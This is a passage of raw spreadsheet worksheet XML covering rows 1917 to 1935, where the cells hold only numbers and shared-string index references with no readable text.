      <c r="T1917" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1917" s="12" t="s">
        <v>13876</v>
      </c>
      <c r="V1917" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W1917" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1917" s="12">
        <v>5</v>
      </c>
      <c r="Y1917" s="12" t="s">
        <v>13877</v>
      </c>
    </row>
    <row r="1918" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1918" s="12">
        <v>10025</v>
      </c>
      <c r="B1918" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D1918" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E1918" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F1918" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="G1918" s="12" t="s">
        <v>13878</v>
      </c>
      <c r="H1918" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1918" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J1918" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1918" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1918" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1918" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1918" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1918" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1918" s="12" t="s">
        <v>13879</v>
      </c>
      <c r="Q1918" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1918" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1918" s="12" t="s">
        <v>13880</v>
      </c>
      <c r="T1918" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1918" s="12" t="s">
        <v>13881</v>
      </c>
      <c r="V1918" s="12" t="s">
        <v>4263</v>
      </c>
      <c r="W1918" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1918" s="12">
        <v>2</v>
      </c>
      <c r="Y1918" s="12" t="s">
        <v>13882</v>
      </c>
    </row>
    <row r="1919" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1919" s="12">
        <v>10026</v>
      </c>
      <c r="B1919" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1919" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E1919" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F1919" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="G1919" s="12" t="s">
        <v>13883</v>
      </c>
      <c r="H1919" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1919" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J1919" s="12" t="s">
        <v>166</v>
      </c>
      <c r="K1919" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1919" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1919" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1919" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1919" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1919" s="12" t="s">
        <v>13642</v>
      </c>
      <c r="Q1919" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1919" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1919" s="12" t="s">
        <v>13884</v>
      </c>
      <c r="T1919" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1919" s="12" t="s">
        <v>13885</v>
      </c>
      <c r="V1919" s="12" t="s">
        <v>167</v>
      </c>
      <c r="W1919" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1919" s="12">
        <v>12</v>
      </c>
      <c r="Y1919" s="12" t="s">
        <v>13886</v>
      </c>
    </row>
    <row r="1920" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1920" s="12">
        <v>10027</v>
      </c>
      <c r="B1920" s="12" t="s">
        <v>30816</v>
      </c>
      <c r="D1920" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F1920" s="12" t="s">
        <v>30152</v>
      </c>
      <c r="G1920" s="12" t="s">
        <v>13887</v>
      </c>
      <c r="H1920" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1920" s="12" t="s">
        <v>5208</v>
      </c>
      <c r="J1920" s="12" t="s">
        <v>12983</v>
      </c>
      <c r="K1920" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1920" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1920" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1920" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1920" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1920" s="12" t="s">
        <v>13642</v>
      </c>
      <c r="Q1920" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1920" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1920" s="12" t="s">
        <v>13888</v>
      </c>
      <c r="T1920" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1920" s="12" t="s">
        <v>13889</v>
      </c>
      <c r="V1920" s="12" t="s">
        <v>12987</v>
      </c>
      <c r="W1920" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1920" s="12">
        <v>4</v>
      </c>
      <c r="Y1920" s="12" t="s">
        <v>13890</v>
      </c>
    </row>
    <row r="1921" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1921" s="12">
        <v>10029</v>
      </c>
      <c r="B1921" s="12" t="s">
        <v>29885</v>
      </c>
      <c r="C1921" s="12" t="s">
        <v>29886</v>
      </c>
      <c r="D1921" s="12" t="s">
        <v>29887</v>
      </c>
      <c r="E1921" s="12" t="s">
        <v>31429</v>
      </c>
      <c r="F1921" s="12" t="s">
        <v>29888</v>
      </c>
      <c r="G1921" s="12" t="s">
        <v>13891</v>
      </c>
      <c r="H1921" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1921" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J1921" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1921" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1921" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1921" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1921" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1921" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1921" s="12" t="s">
        <v>13657</v>
      </c>
      <c r="Q1921" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1921" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1921" s="12" t="s">
        <v>13892</v>
      </c>
      <c r="T1921" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1921" s="12" t="s">
        <v>13893</v>
      </c>
      <c r="V1921" s="12" t="s">
        <v>323</v>
      </c>
      <c r="W1921" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1921" s="12">
        <v>1</v>
      </c>
      <c r="Y1921" s="12" t="s">
        <v>13894</v>
      </c>
    </row>
    <row r="1922" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1922" s="12">
        <v>10030</v>
      </c>
      <c r="B1922" s="12" t="s">
        <v>30464</v>
      </c>
      <c r="C1922" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D1922" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1922" s="12" t="s">
        <v>31548</v>
      </c>
      <c r="F1922" s="12" t="s">
        <v>30463</v>
      </c>
      <c r="G1922" s="12" t="s">
        <v>13895</v>
      </c>
      <c r="H1922" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1922" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J1922" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K1922" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1922" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1922" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1922" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1922" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1922" s="12" t="s">
        <v>13657</v>
      </c>
      <c r="Q1922" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1922" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1922" s="12" t="s">
        <v>13896</v>
      </c>
      <c r="T1922" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1922" s="12" t="s">
        <v>13897</v>
      </c>
      <c r="V1922" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="W1922" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1922" s="12">
        <v>48</v>
      </c>
      <c r="Y1922" s="12" t="s">
        <v>13898</v>
      </c>
    </row>
    <row r="1923" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1923" s="12">
        <v>10031</v>
      </c>
      <c r="B1923" s="12" t="s">
        <v>29779</v>
      </c>
      <c r="C1923" s="12" t="s">
        <v>28406</v>
      </c>
      <c r="D1923" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E1923" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F1923" s="12" t="s">
        <v>29746</v>
      </c>
      <c r="G1923" s="12" t="s">
        <v>13899</v>
      </c>
      <c r="H1923" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1923" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1923" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K1923" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1923" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1923" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1923" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1923" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1923" s="12" t="s">
        <v>13657</v>
      </c>
      <c r="Q1923" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1923" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1923" s="12" t="s">
        <v>13900</v>
      </c>
      <c r="T1923" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1923" s="12" t="s">
        <v>13901</v>
      </c>
      <c r="V1923" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W1923" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1923" s="12">
        <v>2</v>
      </c>
      <c r="Y1923" s="12" t="s">
        <v>13902</v>
      </c>
    </row>
    <row r="1924" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1924" s="12">
        <v>10039</v>
      </c>
      <c r="B1924" s="12" t="s">
        <v>30878</v>
      </c>
      <c r="D1924" s="12" t="s">
        <v>30913</v>
      </c>
      <c r="E1924" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F1924" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1924" s="12" t="s">
        <v>13917</v>
      </c>
      <c r="H1924" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1924" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J1924" s="12" t="s">
        <v>73</v>
      </c>
      <c r="K1924" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1924" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1924" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1924" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1924" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1924" s="12" t="s">
        <v>13642</v>
      </c>
      <c r="Q1924" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1924" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1924" s="12" t="s">
        <v>13918</v>
      </c>
      <c r="T1924" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1924" s="12" t="s">
        <v>13919</v>
      </c>
      <c r="V1924" s="12" t="s">
        <v>78</v>
      </c>
      <c r="W1924" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1924" s="12">
        <v>3</v>
      </c>
      <c r="Y1924" s="12" t="s">
        <v>13920</v>
      </c>
    </row>
    <row r="1925" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1925" s="12">
        <v>10042</v>
      </c>
      <c r="B1925" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C1925" s="12" t="s">
        <v>30810</v>
      </c>
      <c r="D1925" s="12" t="s">
        <v>30791</v>
      </c>
      <c r="F1925" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1925" s="12" t="s">
        <v>13921</v>
      </c>
      <c r="H1925" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1925" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J1925" s="12" t="s">
        <v>3110</v>
      </c>
      <c r="K1925" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1925" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1925" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1925" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1925" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1925" s="12" t="s">
        <v>10414</v>
      </c>
      <c r="Q1925" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1925" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1925" s="12" t="s">
        <v>13922</v>
      </c>
      <c r="T1925" s="12" t="s">
        <v>13923</v>
      </c>
      <c r="U1925" s="12" t="s">
        <v>13924</v>
      </c>
      <c r="V1925" s="12" t="s">
        <v>6839</v>
      </c>
      <c r="W1925" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1925" s="12">
        <v>12</v>
      </c>
      <c r="Y1925" s="12" t="s">
        <v>13925</v>
      </c>
    </row>
    <row r="1926" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1926" s="12">
        <v>10045</v>
      </c>
      <c r="B1926" s="12" t="s">
        <v>31080</v>
      </c>
      <c r="C1926" s="12" t="s">
        <v>28406</v>
      </c>
      <c r="D1926" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1926" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F1926" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1926" s="12" t="s">
        <v>13926</v>
      </c>
      <c r="H1926" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1926" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J1926" s="12" t="s">
        <v>258</v>
      </c>
      <c r="K1926" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1926" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1926" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1926" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1926" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1926" s="12" t="s">
        <v>13927</v>
      </c>
      <c r="Q1926" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1926" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1926" s="12" t="s">
        <v>13928</v>
      </c>
      <c r="T1926" s="12" t="s">
        <v>518</v>
      </c>
      <c r="U1926" s="12" t="s">
        <v>13929</v>
      </c>
      <c r="V1926" s="12" t="s">
        <v>3984</v>
      </c>
      <c r="W1926" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1926" s="12">
        <v>1</v>
      </c>
      <c r="Y1926" s="12" t="s">
        <v>13930</v>
      </c>
    </row>
    <row r="1927" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1927" s="12">
        <v>10048</v>
      </c>
      <c r="B1927" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C1927" s="12" t="s">
        <v>28362</v>
      </c>
      <c r="D1927" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E1927" s="12" t="s">
        <v>31429</v>
      </c>
      <c r="F1927" s="12" t="s">
        <v>29768</v>
      </c>
      <c r="G1927" s="12" t="s">
        <v>13931</v>
      </c>
      <c r="H1927" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1927" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J1927" s="12" t="s">
        <v>139</v>
      </c>
      <c r="K1927" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1927" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1927" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1927" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1927" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1927" s="12" t="s">
        <v>13927</v>
      </c>
      <c r="Q1927" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1927" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1927" s="12" t="s">
        <v>13932</v>
      </c>
      <c r="T1927" s="12" t="s">
        <v>518</v>
      </c>
      <c r="U1927" s="12" t="s">
        <v>13933</v>
      </c>
      <c r="V1927" s="12" t="s">
        <v>995</v>
      </c>
      <c r="W1927" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1927" s="12">
        <v>1</v>
      </c>
      <c r="Y1927" s="12" t="s">
        <v>13934</v>
      </c>
    </row>
    <row r="1928" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1928" s="12">
        <v>10049</v>
      </c>
      <c r="B1928" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1928" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1928" s="12" t="s">
        <v>31429</v>
      </c>
      <c r="F1928" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1928" s="12" t="s">
        <v>13935</v>
      </c>
      <c r="H1928" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1928" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J1928" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1928" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1928" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1928" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1928" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1928" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1928" s="12" t="s">
        <v>13927</v>
      </c>
      <c r="Q1928" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1928" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1928" s="12" t="s">
        <v>13936</v>
      </c>
      <c r="T1928" s="12" t="s">
        <v>518</v>
      </c>
      <c r="U1928" s="12" t="s">
        <v>13937</v>
      </c>
      <c r="V1928" s="12" t="s">
        <v>7519</v>
      </c>
      <c r="W1928" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1928" s="12">
        <v>1</v>
      </c>
      <c r="Y1928" s="12" t="s">
        <v>13938</v>
      </c>
    </row>
    <row r="1929" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1929" s="12">
        <v>10050</v>
      </c>
      <c r="B1929" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C1929" s="12" t="s">
        <v>29701</v>
      </c>
      <c r="D1929" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E1929" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F1929" s="12" t="s">
        <v>29768</v>
      </c>
      <c r="G1929" s="12" t="s">
        <v>13939</v>
      </c>
      <c r="H1929" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1929" s="12" t="s">
        <v>525</v>
      </c>
      <c r="J1929" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1929" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1929" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1929" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1929" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1929" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1929" s="12" t="s">
        <v>13927</v>
      </c>
      <c r="Q1929" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1929" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1929" s="12" t="s">
        <v>13940</v>
      </c>
      <c r="T1929" s="12" t="s">
        <v>518</v>
      </c>
      <c r="U1929" s="12" t="s">
        <v>13941</v>
      </c>
      <c r="V1929" s="12" t="s">
        <v>8781</v>
      </c>
      <c r="W1929" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1929" s="12">
        <v>1</v>
      </c>
      <c r="Y1929" s="12" t="s">
        <v>13942</v>
      </c>
    </row>
    <row r="1930" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1930" s="12">
        <v>10051</v>
      </c>
      <c r="B1930" s="12" t="s">
        <v>29814</v>
      </c>
      <c r="C1930" s="12" t="s">
        <v>29781</v>
      </c>
      <c r="D1930" s="12" t="s">
        <v>29802</v>
      </c>
      <c r="F1930" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1930" s="12" t="s">
        <v>13943</v>
      </c>
      <c r="H1930" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1930" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1930" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K1930" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1930" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1930" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1930" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1930" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1930" s="12" t="s">
        <v>13944</v>
      </c>
      <c r="Q1930" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1930" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1930" s="12" t="s">
        <v>13945</v>
      </c>
      <c r="T1930" s="12" t="s">
        <v>10763</v>
      </c>
      <c r="U1930" s="12" t="s">
        <v>13946</v>
      </c>
      <c r="V1930" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W1930" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1930" s="12">
        <v>7</v>
      </c>
      <c r="Y1930" s="12" t="s">
        <v>13947</v>
      </c>
    </row>
    <row r="1931" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1931" s="12">
        <v>10054</v>
      </c>
      <c r="B1931" s="12" t="s">
        <v>28354</v>
      </c>
      <c r="D1931" s="12" t="s">
        <v>30457</v>
      </c>
      <c r="F1931" s="12" t="s">
        <v>30466</v>
      </c>
      <c r="G1931" s="12" t="s">
        <v>13948</v>
      </c>
      <c r="H1931" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1931" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J1931" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K1931" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1931" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1931" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1931" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1931" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1931" s="12" t="s">
        <v>13657</v>
      </c>
      <c r="Q1931" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1931" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1931" s="12" t="s">
        <v>13949</v>
      </c>
      <c r="T1931" s="12" t="s">
        <v>13950</v>
      </c>
      <c r="U1931" s="12" t="s">
        <v>13951</v>
      </c>
      <c r="V1931" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="W1931" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1931" s="12">
        <v>22</v>
      </c>
      <c r="Y1931" s="12" t="s">
        <v>13952</v>
      </c>
    </row>
    <row r="1932" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1932" s="12">
        <v>10061</v>
      </c>
      <c r="B1932" s="12" t="s">
        <v>29974</v>
      </c>
      <c r="C1932" s="12" t="s">
        <v>29959</v>
      </c>
      <c r="D1932" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F1932" s="12" t="s">
        <v>29954</v>
      </c>
      <c r="G1932" s="12" t="s">
        <v>13955</v>
      </c>
      <c r="H1932" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1932" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J1932" s="12" t="s">
        <v>1269</v>
      </c>
      <c r="K1932" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1932" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1932" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1932" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1932" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1932" s="12" t="s">
        <v>13657</v>
      </c>
      <c r="Q1932" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1932" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1932" s="12" t="s">
        <v>13956</v>
      </c>
      <c r="T1932" s="12" t="s">
        <v>9452</v>
      </c>
      <c r="U1932" s="12" t="s">
        <v>13957</v>
      </c>
      <c r="V1932" s="12" t="s">
        <v>3176</v>
      </c>
      <c r="W1932" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1932" s="12">
        <v>9</v>
      </c>
      <c r="Y1932" s="12" t="s">
        <v>13958</v>
      </c>
    </row>
    <row r="1933" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1933" s="12">
        <v>10064</v>
      </c>
      <c r="B1933" s="12" t="s">
        <v>31191</v>
      </c>
      <c r="D1933" s="12" t="s">
        <v>31189</v>
      </c>
      <c r="E1933" s="12" t="s">
        <v>31435</v>
      </c>
      <c r="F1933" s="12" t="s">
        <v>31194</v>
      </c>
      <c r="G1933" s="12" t="s">
        <v>13959</v>
      </c>
      <c r="H1933" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1933" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J1933" s="12" t="s">
        <v>2023</v>
      </c>
      <c r="K1933" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1933" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1933" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1933" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1933" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1933" s="12" t="s">
        <v>10414</v>
      </c>
      <c r="Q1933" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1933" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1933" s="12" t="s">
        <v>13960</v>
      </c>
      <c r="T1933" s="12" t="s">
        <v>4098</v>
      </c>
      <c r="U1933" s="12" t="s">
        <v>13961</v>
      </c>
      <c r="V1933" s="12" t="s">
        <v>2027</v>
      </c>
      <c r="W1933" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1933" s="12">
        <v>2</v>
      </c>
      <c r="Y1933" s="12" t="s">
        <v>13962</v>
      </c>
    </row>
    <row r="1934" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1934" s="12">
        <v>10065</v>
      </c>
      <c r="B1934" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C1934" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D1934" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1934" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F1934" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1934" s="12" t="s">
        <v>13963</v>
      </c>
      <c r="H1934" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1934" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1934" s="12" t="s">
        <v>356</v>
      </c>
      <c r="K1934" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1934" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1934" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1934" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1934" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1934" s="12" t="s">
        <v>13657</v>
      </c>
      <c r="Q1934" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1934" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1934" s="12" t="s">
        <v>13964</v>
      </c>
      <c r="T1934" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1934" s="12" t="s">
        <v>13965</v>
      </c>
      <c r="V1934" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W1934" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1934" s="12">
        <v>19</v>
      </c>
      <c r="Y1934" s="12" t="s">
        <v>13966</v>
      </c>
    </row>
    <row r="1935" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1935" s="12">
        <v>10075</v>
      </c>
      <c r="B1935" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1935" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F1935" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="G1935" s="12" t="s">
        <v>13976</v>
      </c>
      <c r="H1935" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1935" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J1935" s="12" t="s">
        <v>166</v>
      </c>
      <c r="K1935" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1935" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1935" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1935" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1935" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1935" s="12" t="s">
        <v>13977</v>
      </c>
      <c r="Q1935" s="12" t="s">
        <v>28336</v>
      </c>
      <c r="R1935" s="12" t="s">
        <v>17</v>
      </c>
